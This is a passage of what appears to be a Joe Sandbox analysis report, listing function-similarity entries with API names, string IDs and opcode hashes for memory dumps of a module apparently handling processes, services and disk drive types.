                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
                                                                                                                                                                                                                • String ID: (ssss)$fixed
                                                                                                                                                                                                                • API String ID: 1595588724-1783892515
                                                                                                                                                                                                                • Opcode ID: fff5570b5060184986b8caae02e100f9e37fbc8f854c84287e39b5ac5612822b
                                                                                                                                                                                                                • Instruction ID: dd68d00a1c7e1b9af15d2f53659338812eb73c6d9d4f575fb5284b68d36b5236
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fff5570b5060184986b8caae02e100f9e37fbc8f854c84287e39b5ac5612822b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F114FA1B09A8685EA30DF72E8046B963A0FF4CB58FC85035C98E46755FE3CE149C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
                                                                                                                                                                                                                • String ID: (ssss)$cdrom
                                                                                                                                                                                                                • API String ID: 1595588724-3732572278
                                                                                                                                                                                                                • Opcode ID: 57ecbf51a61788dfee4cb626ccb9ca1eebc7545966e79e12385e4591728c9a23
                                                                                                                                                                                                                • Instruction ID: 63af5e4a43d90bab62e40d961b5e7f1a989420945469dc706a70dae947c4108c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57ecbf51a61788dfee4cb626ccb9ca1eebc7545966e79e12385e4591728c9a23
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF114FA1B09A8685EA30DF72E8046B963A4FF4CB58FC85035C98E46755FE3CE149C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
                                                                                                                                                                                                                • String ID: (ssss)$removable
                                                                                                                                                                                                                • API String ID: 1595588724-4184024711
                                                                                                                                                                                                                • Opcode ID: 3371c800e02b6f27b4f0bc8ae7f63ab1221f932767a5d01b5a4ee71868bc7488
                                                                                                                                                                                                                • Instruction ID: 2774af7cd6bf7aa21892c8cf5a83384e547fdff2cebbd772684082859819c0d2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3371c800e02b6f27b4f0bc8ae7f63ab1221f932767a5d01b5a4ee71868bc7488
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5114FA1B09A8685EA30DF72E8046B963A0FF4DB58FC85035C98E46755FE3CE149C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Arg_BuildDeviceParseQueryTupleValue__stdio_common_vsprintf_smemsetswprintf_s
                                                                                                                                                                                                                • String ID: %c:$:
                                                                                                                                                                                                                • API String ID: 784832287-4169684950
                                                                                                                                                                                                                • Opcode ID: c36e93091ea0fa53515c8ffaf2328a1cc7e56425024552580debbe531ed2ddde
                                                                                                                                                                                                                • Instruction ID: fa12050ad617cc3ca7d55332a89b9d37e4cd237841f8f0495bb830b6fbe3508f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c36e93091ea0fa53515c8ffaf2328a1cc7e56425024552580debbe531ed2ddde
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6319AA171C68746E7718F76D8512BA3BA0EF89744FC86036D6CD82665FF2CE509C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_ServiceThread$Arg_CloseControlHandleParseRestoreSaveTuple
                                                                                                                                                                                                                • String ID: ControlService
                                                                                                                                                                                                                • API String ID: 1908151670-253159669
                                                                                                                                                                                                                • Opcode ID: 17f90c403e5eb0df82662931804360693879771c4f93eb81ea2b7320ae8cb868
                                                                                                                                                                                                                • Instruction ID: 3237a6ef9857da36368ecc0ba067a07c6db1889d975481cb45a443a9a23cc9df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17f90c403e5eb0df82662931804360693879771c4f93eb81ea2b7320ae8cb868
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E321DFA1B4CA4682EB209B37E85117963A1FF8DB94FC52035D98D43B65FF3DE1468780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
                                                                                                                                                                                                                • String ID: (KsOI)
                                                                                                                                                                                                                • API String ID: 1097362947-341566991
                                                                                                                                                                                                                • Opcode ID: bb93f2e791c74b06c503ff55e854b4f2b4c8aa95054248553b7d0ff19736460e
                                                                                                                                                                                                                • Instruction ID: fe6c43bab3633aeed2e53574930bf61096f8338369f0df41fd722fa17fa95ca4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb93f2e791c74b06c503ff55e854b4f2b4c8aa95054248553b7d0ff19736460e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01111FB1B0DA8285EA708F33E4582796360BFADB95F842032DD8E57754FE3CE0458380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
                                                                                                                                                                                                                • String ID: (KsOI)
                                                                                                                                                                                                                • API String ID: 1097362947-341566991
                                                                                                                                                                                                                • Opcode ID: 36eb1ef3898e88aaec895ac89283d0571a7033b47906345bfeb9f72e29fbe982
                                                                                                                                                                                                                • Instruction ID: 00c776b2e4212f0a7f4cbbcedaebc24c86d460fecce02b7392578f256e3d5fe1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36eb1ef3898e88aaec895ac89283d0571a7033b47906345bfeb9f72e29fbe982
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE111FB1B0DA8285EA748F33E4582796360BF6DB95F842032DD8E57754FE3CE0458380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
                                                                                                                                                                                                                • String ID: (KsOI)
                                                                                                                                                                                                                • API String ID: 1097362947-341566991
                                                                                                                                                                                                                • Opcode ID: 208d4ccfd0bd7aa230a2353d25ce14191a6dd2761953c8efdb017f03263fe47b
                                                                                                                                                                                                                • Instruction ID: f3afdaeb0a1396d9356361bc657f78e14aa0c692db6d6a688926c3b79a17312d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 208d4ccfd0bd7aa230a2353d25ce14191a6dd2761953c8efdb017f03263fe47b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B111FB1B0DA8285EA709F33E4582796360BF6DB95F842032DD8E57754FE3CE0458380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
                                                                                                                                                                                                                • String ID: (KsOI)
                                                                                                                                                                                                                • API String ID: 1097362947-341566991
                                                                                                                                                                                                                • Opcode ID: 68c1128f8217c209b438140e0ab80c0cf34bd897a476936f67651079a2b26aaf
                                                                                                                                                                                                                • Instruction ID: 10ac3c1a11c6fabdf0bede0755d9e9a56615cbc6540a78301347829abc3aacbb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68c1128f8217c209b438140e0ab80c0cf34bd897a476936f67651079a2b26aaf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50110DA1B09A8285EA708F33E4582796360BF6DB94F842032DD8E57754FE3CE0458380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
                                                                                                                                                                                                                • String ID: (KsOI)
                                                                                                                                                                                                                • API String ID: 1097362947-341566991
                                                                                                                                                                                                                • Opcode ID: 5fd2dceecc98a189c04317e2f72177223008d843a55c624df68859818461c526
                                                                                                                                                                                                                • Instruction ID: 04d029d1b56ee2ee1a4e9a167d3fb6ac6d42af84d73043e29914b762f3470924
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fd2dceecc98a189c04317e2f72177223008d843a55c624df68859818461c526
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C111FB1B0DA8685EA708F33E4582796360BF6DB95F842032DD8E57754FE3CE0458380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
                                                                                                                                                                                                                • String ID: (KsOI)
                                                                                                                                                                                                                • API String ID: 1097362947-341566991
                                                                                                                                                                                                                • Opcode ID: c1540cd3b0634550bd1122f653fd40982ffb95a102a837543736d3d91fdcfc01
                                                                                                                                                                                                                • Instruction ID: 8f30f926aa1e04e9909ee6136cf7fe02786d5553b9ff774a76d6be2abc07322d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1540cd3b0634550bd1122f653fd40982ffb95a102a837543736d3d91fdcfc01
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44111CB1B0DA8685EA708F33E4582796360BFADB94F842032DE8E57754FE3CE0458380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: List_$AppendDeallocFromLongLong_free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 762243878-0
                                                                                                                                                                                                                • Opcode ID: 66ddbc0329e381d51be71da3152d1fc3f90bb8ef96ba1be280b286ebe349667c
                                                                                                                                                                                                                • Instruction ID: af441528ca875c366ca0a826683c5841bff6cbd886bc8d46d0347ee882c4af2f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66ddbc0329e381d51be71da3152d1fc3f90bb8ef96ba1be280b286ebe349667c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F215AB6B0DB4282EA719F76F41417A63A0BF9DB84B992435CA8D07754FE3CE4418780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Arg_CallCloseDeallocErr_ErrorFunctionHandleLastObjectObject_OpenParseProcessTuple
                                                                                                                                                                                                                • String ID: OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 3428877611-2746090705
                                                                                                                                                                                                                • Opcode ID: 9365e794f7a2c9466c73e0e7a61611867a25e8db539fa53f5ab61896464e3a1e
                                                                                                                                                                                                                • Instruction ID: c1194226710a802df5a6c9af55f1edaf1fc60da5cea14c7f6fa28bf06fb46d5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9365e794f7a2c9466c73e0e7a61611867a25e8db539fa53f5ab61896464e3a1e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1411A390B1DA4642EA309B77E8841796391AF5D780FC96035DA9E477A5FE2CE8848380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_CloseFromHandleLong$Arg_ClearErr_ErrorLastOpenParseProcessTuple
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4107186332-0
                                                                                                                                                                                                                • Opcode ID: 51db0d12a93dc2e0f30fe020c095412b55ea7dfc7f52a68a1eb8d6e0cc7b2091
                                                                                                                                                                                                                • Instruction ID: 981b9b6bcea31e758ed54c5d6a11bcd60f53f31f73047784c4d637ea58edd341
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51db0d12a93dc2e0f30fe020c095412b55ea7dfc7f52a68a1eb8d6e0cc7b2091
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B0140A0F0CA0242FF385B73E8542751292AF5C741F896038D5AE473D1FE3CA8958380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Arg_CallCloseDeallocErr_ErrorFunctionHandleLastObjectObject_ParseProcessTerminateTuple
                                                                                                                                                                                                                • String ID: TerminateProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 4064933840-3562140098
                                                                                                                                                                                                                • Opcode ID: 96ee3a5b78319e1308ff1afb7144d4f9c45ee2194ece06c57e7b2fc60d094773
                                                                                                                                                                                                                • Instruction ID: 0842879b5ef9e4047e200475a8de85243fc888ac64aee8dbfa01a56da1f91f40
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96ee3a5b78319e1308ff1afb7144d4f9c45ee2194ece06c57e7b2fc60d094773
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B01EDE0F0D90782FB359BB7E8505B92361AF5DB41FD56035C58D866A1FE2CE895C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseFreeHandleProcessService$BuildValue
                                                                                                                                                                                                                • String ID: (sk)$stopped
                                                                                                                                                                                                                • API String ID: 127882022-1133211610
                                                                                                                                                                                                                • Opcode ID: 5db063c69b56fa29c44e9e9f56adae1de52bf740f7b2cf0a61671514e64b58fa
                                                                                                                                                                                                                • Instruction ID: 975c16f4b383a53714ff4fe12b73c3076a8b09f8b077a9ca0570df7f073c0f46
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5db063c69b56fa29c44e9e9f56adae1de52bf740f7b2cf0a61671514e64b58fa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F082A1F0CA46C1EB64DB37E8040382770BF4DB84B846031C98D43768FF2CE5098380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseFreeHandleProcessService$BuildValue
                                                                                                                                                                                                                • String ID: (sk)$pause_pending
                                                                                                                                                                                                                • API String ID: 127882022-461645825
                                                                                                                                                                                                                • Opcode ID: 6569a5fb80fdf4246656b6a0a3083e6316541fcc9ef978573a0fd2d353914650
                                                                                                                                                                                                                • Instruction ID: 127fe043a0ef9d0663bca9527deb2bc8121a9fb5348d98df89c5cbd1183c92a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6569a5fb80fdf4246656b6a0a3083e6316541fcc9ef978573a0fd2d353914650
